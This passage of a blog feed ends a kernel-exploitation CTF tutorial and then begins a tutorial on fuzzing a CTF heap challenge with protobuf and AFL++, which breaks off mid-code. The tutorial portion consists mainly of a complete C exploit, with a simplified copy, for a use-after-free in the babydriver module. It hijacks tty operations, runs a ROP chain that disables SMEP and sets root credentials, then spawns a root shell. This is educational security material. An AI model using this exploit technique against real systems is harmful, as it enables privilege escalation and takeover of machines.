class="built_in">printf</span>(</span><br><span class="line">        <span class="string">&quot;[+] iret data saved.\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_cs: %ld\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_eflags: %ld\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_rsp: %p\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_ss: %ld\n&quot;</span>,</span><br><span class="line">        user_cs, user_eflags, (<span class="type">char</span>*)user_rsp, user_ss</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> fd1 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0x2e0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">close</span>(fd1);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// allocate a tty_struct</span></span><br><span class="line">    <span class="type">int</span> master_fd = <span class="built_in">open</span>(<span class="string">&quot;/dev/ptmx&quot;</span>, O_RDWR);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// build a fake tty_operations table</span></span><br><span class="line">    <span class="type">u_int64_t</span> fake_tty_ops[] = &#123;</span><br><span class="line">        <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, 
<span class="number">0</span>,</span><br><span class="line">        xchg_eax_esp_addr, <span class="comment">// int  (*write)(struct tty_struct*, const unsigned char *, int)</span></span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] fake_tty_ops constructed\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">u_int64_t</span> hijacked_stack_addr = ((<span class="type">u_int64_t</span>)fake_tty_ops &amp; <span class="number">0xffffffff</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] hijacked_stack addr: %p\n&quot;</span>, (<span class="type">char</span>*)hijacked_stack_addr);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span>* fake_stack = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">if</span> ((fake_stack = <span class="built_in">mmap</span>(</span><br><span class="line">            (<span class="type">char</span>*)((hijacked_stack_addr &amp; (~<span class="number">0xffff</span>))),  <span class="comment">// addr, page-aligned</span></span><br><span class="line">            <span class="number">0x10000</span>,                                     <span class="comment">// length</span></span><br><span class="line">            PROT_READ | PROT_WRITE,                     <span class="comment">// prot</span></span><br><span class="line">            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,    <span class="comment">// flags</span></span><br><span class="line">            <span class="number">-1</span>,                                         <span class="comment">// fd</span></span><br><span class="line">            <span class="number">0</span>)                                          <span class="comment">// offset</span></span><br><span class="line">        ) == MAP_FAILED)  </span><br><span 
class="line">        <span class="built_in">perror</span>(<span class="string">&quot;mmap&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+]     fake_stack addr: %p\n&quot;</span>, fake_stack);</span><br><span class="line"></span><br><span class="line">    <span class="type">u_int64_t</span>* hijacked_stack_ptr = (<span class="type">u_int64_t</span>*)hijacked_stack_addr;</span><br><span class="line">    <span class="type">int</span> idx = <span class="number">0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = pop_rdi_addr;              <span class="comment">// pop rdi; ret</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0x6f0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  <span class="comment">// mov cr4, rdi; pop rbp; ret;</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                         <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)set_root_cred;</span><br><span class="line">    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                          <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = iretq_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)get_shell;       <span class="comment">// iret_data.rip</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = user_cs;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_eflags;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_rsp;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_ss;</span><br><span 
class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] privilege escape ROP prepared\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Read the leading bytes of tty_struct, up to and including the ops pointer</span></span><br><span class="line">    <span class="type">int</span> ops_ptr_offset = <span class="number">4</span> + <span class="number">4</span> + <span class="number">8</span> + <span class="number">8</span>;</span><br><span class="line">    <span class="type">char</span> overwrite_mem[ops_ptr_offset + <span class="number">8</span>];</span><br><span class="line">    <span class="type">char</span>** ops_ptr_addr = (<span class="type">char</span>**)(overwrite_mem + ops_ptr_offset);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">read</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] origin ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Patch the ops pointer and write the data back over tty_struct</span></span><br><span class="line">    *ops_ptr_addr = (<span class="type">char</span>*)fake_tty_ops;</span><br><span class="line">    <span class="built_in">write</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] hacked ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// Trigger tty_write</span></span><br><span class="line">    <span class="comment">// Note: the buf pointer passed to write must be valid (and cover the 8 bytes written), otherwise write returns EFAULT early</span></span><br><span class="line">    <span class="type">char</span> buf[<span class="number">8</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span 
class="built_in">write</span>(master_fd, buf, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Result of running the exploit:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013214429834.png" alt="image-20211013214429834"></p><p>Below is a simplified version of the exploit:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span 
class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span 
class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> xchg_eax_esp_addr           0xffffffff8100008a</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> prepare_kernel_cred_addr    0xffffffff810a1810</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> commit_creds_addr           0xffffffff810a1420</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> pop_rdi_addr                0xffffffff810d238d</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swapgs_pop_rbp_addr         0xffffffff81063694          </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> iretq_addr                  0xffffffff814e35ef</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">set_root_cred</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="type">void</span>* (*prepare_kernel_cred)(<span class="type">void</span>*) = prepare_kernel_cred_addr;</span><br><span class="line">    <span class="built_in">void</span> (*commit_creds)(<span class="type">void</span>*) = commit_creds_addr;</span><br><span class="line">    <span class="built_in">commit_creds</span>(<span class="built_in">prepare_kernel_cred</span>(<span 
class="literal">NULL</span>));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">get_shell</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">long</span> user_cs, user_eflags, user_rsp, user_ss;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">save_iret_data</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%cs, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_cs));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pushf&quot;</span>);</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pop %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_eflags));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%rsp, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_rsp));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%ss, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_ss));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">save_iret_data</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> fd1 = <span class="built_in">open</span>(<span 
class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="type">int</span> fd2 = <span class="built_in">open</span>(<span class="string">&quot;/dev/babydev&quot;</span>, O_RDWR);</span><br><span class="line">    <span class="built_in">ioctl</span>(fd1, <span class="number">65537</span>, <span class="number">0x2e0</span>);</span><br><span class="line">    <span class="built_in">close</span>(fd1);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> master_fd = <span class="built_in">open</span>(<span class="string">&quot;/dev/ptmx&quot;</span>, O_RDWR);</span><br><span class="line"></span><br><span class="line">    <span class="type">u_int64_t</span> fake_tty_ops[] = &#123;</span><br><span class="line">        <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>,</span><br><span class="line">        xchg_eax_esp_addr</span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="type">u_int64_t</span> hijacked_stack_addr = ((<span class="type">u_int64_t</span>)fake_tty_ops &amp; <span class="number">0xffffffff</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span>* fake_stack = <span class="built_in">mmap</span>(</span><br><span class="line">            (hijacked_stack_addr &amp; (~<span class="number">0xffff</span>)),</span><br><span class="line">            <span class="number">0x10000</span>,</span><br><span class="line">            PROT_READ | PROT_WRITE,                    </span><br><span class="line">            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,</span><br><span class="line">            <span class="number">-1</span>,</span><br><span class="line">            <span class="number">0</span>);</span><br><span 
class="line">    </span><br><span class="line">    <span class="type">u_int64_t</span> rop_chain_mem[] = &#123;</span><br><span class="line">        pop_rdi_addr, <span class="number">0x6f0</span>, </span><br><span class="line">        mov_cr4_rdi_pop_rbp_addr, <span class="number">0</span>, set_root_cred,</span><br><span class="line">        swapgs_pop_rbp_addr, <span class="number">0</span>, </span><br><span class="line">        iretq_addr, get_shell, user_cs, user_eflags, user_rsp, user_ss</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="built_in">memcpy</span>(hijacked_stack_addr, rop_chain_mem, <span class="built_in">sizeof</span>(rop_chain_mem));</span><br><span class="line">    </span><br><span class="line">    <span class="type">int</span> ops_ptr_offset = <span class="number">4</span> + <span class="number">4</span> + <span class="number">8</span> + <span class="number">8</span>;</span><br><span class="line">    <span class="type">char</span> overwrite_mem[ops_ptr_offset + <span class="number">8</span>];</span><br><span class="line">    <span class="type">char</span>** ops_ptr_addr = overwrite_mem + ops_ptr_offset;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">read</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line">    *ops_ptr_addr = fake_tty_ops;</span><br><span class="line">    <span class="built_in">write</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> buf[<span class="number">8</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">    <span class="built_in">write</span>(master_fd, buf, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="五、参考">V. References</h2><ul><li><a href="https://wiki.x10sec.org/pwn/linux/kernel-mode/environment/readme/">CTF Wiki - Linux Platform Kernel Mode</a></li><li><a href="https://linuxlink.timesys.com/docs/how_to_use_kgdb">How to use KGDB - LinuxLink</a></li><li><a href="https://d1nn3r.github.io/2019/07/27/kernelexp/">kernelexp学习笔记</a></li><li><a href="https://blog.csdn.net/m0_38100569/article/details/100673103">【Writeup】CISCN2017_Pwn_babydriver - CSDN</a></li><li><em><a href="https://lwn.net/Kernel/LDD3/">Linux Device Drivers, Third Edition - Chapter 3 Char Drivers</a></em></li><li><a href="https://blog.csdn.net/tq384998430/article/details/54342044">Linux下使用class_create,device_create自动创建设备文件结点</a></li><li><a href="https://www.cnblogs.com/bittorrent/p/3789193.html">Linux下tty/pty/pts/ptmx详解</a></li><li><a href="https://www.cnblogs.com/dux2016/articles/6236131.html">Linux终端简介与pty编程</a></li><li>Linux manual page</li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;An introduction to kernel CTF challenges, based mainly on &lt;a href=&quot;https://wiki.x10sec.org/pwn/linux/kernel-mode/environment/readme/&quot;&gt;CTF-Wiki&lt;/a&gt;.&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
    <category term="kernel" scheme="https://kiprey.github.io/tags/kernel/"/>
    
  </entry>
  
  <entry>
    <title>Simple automated CTF fuzzing with protobuf &amp; AFLplusplus</title>
    <link href="https://kiprey.github.io/2021/09/protobuf_ctf_fuzz/"/>
    <id>https://kiprey.github.io/2021/09/protobuf_ctf_fuzz/</id>
    <published>2021-09-26T05:39:22.000Z</published>
    <updated>2025-11-24T03:59:40.069Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>While reading about <a href="https://github.com/google/fuzzing/blob/master/docs/structure-aware-fuzzing.md">structure-aware fuzzing</a> I came across protobuf and found it interesting, so I tried using protobuf for quick and simple CTF fuzzing.</p><p>The following uses <a href="https://ctftime.org/task/16415">TCTF2021-babyheap2021</a> as an example to briefly walk through the automation steps.</p><p>The setup mainly relies on the following projects:</p><ul><li><a href="https://github.com/AFLplusplus/AFLplusplus">AFL++</a>, specifically its qemu mode + qasan</li><li><a href="https://github.com/thebabush/afl-libprotobuf-mutator">afl-libprotobuf-mutator</a></li></ul><p>Note that this fuzzing setup is still experimental and may be unstable; it is intended for learning and research only.</p><span id="more"></span><h2 id="二、操作流程">II. Procedure</h2><h3 id="1-下载依赖">1. Download the dependencies</h3><p>Simply git clone AFL++ and afl-libprotobuf-mutator (links above).</p><h3 id="2-配置-afl-libprotobuf-mutator">2. Configure afl-libprotobuf-mutator</h3><ul><li><p>First, open babyheap2021 in ida64, press F5 to read the pseudocode and work out its input template, then describe the input structure with protobuf:</p><blockquote><p>The input template of menu-style challenges like this one is largely fixed, so the code below can be reused for another challenge with minor changes.</p></blockquote><p>Once the description is written, save it to <code>afl-libprotobuf-mutator/gen/out.proto</code>. Note that <strong>the path must match exactly</strong>; if a file named out.proto already exists there, simply overwrite it.</p><blockquote><p>If you are not familiar with writing protobuf descriptions, see the <a href="https://developers.google.com/protocol-buffers/docs/tutorials">Protocol Buffers Tutorials</a>.</p></blockquote><figure class="highlight protobuf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// out.proto</span></span><br><span class="line">syntax = <span class="string">&quot;proto2&quot;</span>;</span><br><span class="line"><span class="keyword">package</span> menuctf;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">AllocChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">1</span>];</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> size = <span class="number">2</span>;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">string</span> content = <span class="number">3</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">UpdateChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">2</span>];</span><br><span class="line"> 
 <span class="keyword">required</span> <span class="type">int32</span> idx = <span class="number">2</span>;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> size = <span class="number">3</span>;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">string</span> content = <span class="number">4</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">DeleteChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">3</span>];</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> idx = <span class="number">2</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">ViewChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">4</span>];</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> idx = <span class="number">2</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">message </span><span class="title class_">ExitChoice</span> &#123;</span><br><span class="line">  <span class="keyword">required</span> <span class="type">int32</span> choice_id = <span class="number">1</span> [default=<span class="number">5</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// The fuzz input is just a list of menu choices.</span></span><br><span class="line"><span 
class="keyword">message </span><span class="title class_">ChoiceList</span> &#123;</span><br><span class="line">  <span class="keyword">message </span><span class="title class_">Choice</span> &#123;</span><br><span class="line">    <span class="keyword">oneof</span> the_choice&#123;</span><br><span class="line">      AllocChoice alloc_choice = <span class="number">1</span>;</span><br><span class="line">      UpdateChoice update_choice = <span class="number">2</span>;</span><br><span class="line">      DeleteChoice delete_choice = <span class="number">3</span>;</span><br><span class="line">      ViewChoice view_choice = <span class="number">4</span>;</span><br><span class="line">      ExitChoice exit_choice = <span class="number">5</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">repeated</span> Choice choice = <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>At this point it is worth sorting out the plan. Most CTF challenges read their input as <strong>text data</strong> directly from stdin. So the first step is to write code that converts a <code>Protobuf::Message</code> into a <strong>regular input string</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">ProtoToDataHelper</span><span class="params">(std::stringstream &amp;out, <span class="type">const</span> google::protobuf::Message &amp;msg)</span> </span>&#123;</span><br><span class="line">  <span class="type">const</span> google::protobuf::Descriptor *desc = msg.<span class="built_in">GetDescriptor</span>();</span><br><span class="line">  <span class="type">const</span> google::protobuf::Reflection *refl = msg.<span class="built_in">GetReflection</span>();</span><br><span class="line"></span><br><span class="line">  <span class="type">const</span> <span class="type">unsigned</span> fields = desc-&gt;<span class="built_in">field_count</span>();</span><br><span class="line">  <span class="comment">// std::cout &lt;&lt; msg.DebugString() &lt;&lt; std::endl;</span></span><br><span class="line">  <span class="keyword">for</span> (<span class="type">unsigned</span> i = <span class="number">0</span>; i &lt; fields; ++i) &#123;</span><br><span class="line">    <span class="type">const</span> google::protobuf::FieldDescriptor *field = desc-&gt;<span class="built_in">field</span>(i);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// For a message-typed field (a choice)</span></span><br><span class="line">    <span class="keyword">if</span> 
(field-&gt;<span class="built_in">cpp_type</span>() == google::protobuf::FieldDescriptor::CPPTYPE_MESSAGE) &#123;</span><br><span class="line">      <span class="comment">// If this field is the choice list</span></span><br><span class="line">      <span class="keyword">if</span> (field-&gt;<span class="built_in">is_repeated</span>()) &#123;</span><br><span class="line">        <span class="type">const</span> google::protobuf::RepeatedFieldRef&lt;google::protobuf::Message&gt; &amp;ptr = refl-&gt;<span class="built_in">GetRepeatedFieldRef</span>&lt;google::protobuf::Message&gt;(msg, field);</span><br><span class="line">        <span class="comment">// Emit each choice, one per line</span></span><br><span class="line">        <span class="keyword">for</span> (<span class="type">const</span> <span class="keyword">auto</span> &amp;child : ptr) &#123;</span><br><span class="line">          <span class="built_in">ProtoToDataHelper</span>(out, child);</span><br><span class="line">          out &lt;&lt; <span class="string">&quot;\n&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">      <span class="comment">// If this field is one of the sub-choices and it is set</span></span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> (refl-&gt;<span class="built_in">HasField</span>(msg, field)) &#123;</span><br><span class="line">        <span class="type">const</span> google::protobuf::Message &amp;child = refl-&gt;<span class="built_in">GetMessage</span>(msg, field);</span><br><span class="line">        <span class="built_in">ProtoToDataHelper</span>(out, child);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125; </span><br><span class="line">    <span class="comment">// For a scalar field</span></span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (field-&gt;<span class="built_in">cpp_type</span>() == google::protobuf::FieldDescriptor::CPPTYPE_INT32) &#123;</span><br><span class="line">    
  out &lt;&lt; refl-&gt;<span class="built_in">GetInt32</span>(msg, field);</span><br><span class="line">      <span class="keyword">if</span>(i &lt; fields - <span class="number">1</span>) </span><br><span class="line">        out &lt;&lt; <span class="string">&quot; &quot;</span>;</span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (field-&gt;<span class="built_in">cpp_type</span>() == google::protobuf::FieldDescriptor::CPPTYPE_STRING) &#123;</span><br><span class="line">      out &lt;&lt; refl-&gt;<span class="built_in">GetString</span>(msg, field);</span><br><span class="line">      <span class="keyword">if</span>(i &lt; fields - <span class="number">1</span>) </span><br><span class="line">        out &lt;&lt; <span class="string">&quot; &quot;</span>;</span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="built_in">abort</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Next, following AFL++'s <a href="https://github.com/AFLplusplus/AFLplusplus/blob/dev/docs/custom_mutators.md">Custom Mutators in AFL++</a> documentation, implement the required custom mutator functions.</p><p>The following functions need to be implemented:</p><ul><li><code>void *afl_custom_init(void *afl, unsigned int seed)</code>: initialization performed before any custom mutation runs; here it only needs to seed the random engine.</li><li><code>size_t afl_custom_fuzz(void *data, unsigned char *buf, size_t buf_size, unsigned char **out_buf, unsigned char *add_buf, size_t add_buf_size, size_t max_size)</code>: the mutation logic; write your own mutation code in this function.</li><li><code>size_t afl_custom_post_process(void* data, uint8_t *buf, size_t buf_size, uint8_t **out_buf)</code>: converts the binary protobuf::Message data into data the target can read.</li><li><code>void afl_custom_deinit(void 
*data)</code>: cleanup after mutation has finished; nothing needs to be handled here for now.</li><li><code>int32_t afl_custom_init_trim(void *data, uint8_t *buf, size_t buf_size)</code>: initialization of the custom trim logic. To <strong>prevent the trim logic from corrupting the binary protobuf::Message data</strong> and breaking the normal Parse step, this function can simply return 0, which skips every trim stage.</li><li><code>size_t afl_custom_trim(void *data, uint8_t **out_buf)</code>: the custom trim logic. Because <code>afl_custom_init_trim</code> returns 0, this function is never actually called, but it must still be provided to enable the custom trim logic.</li></ul><blockquote><p>Note that the whole <code>extern &quot;C&quot;</code> block, together with the <code>ProtoToDataHelper</code> function it uses, must be placed in <code>afl-libprotobuf-mutator/src/mutate.cc</code>.</p><p>Because afl-libprotobuf-mutator is fairly old, most of its AFL++-related interfaces need a fair amount of modification.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 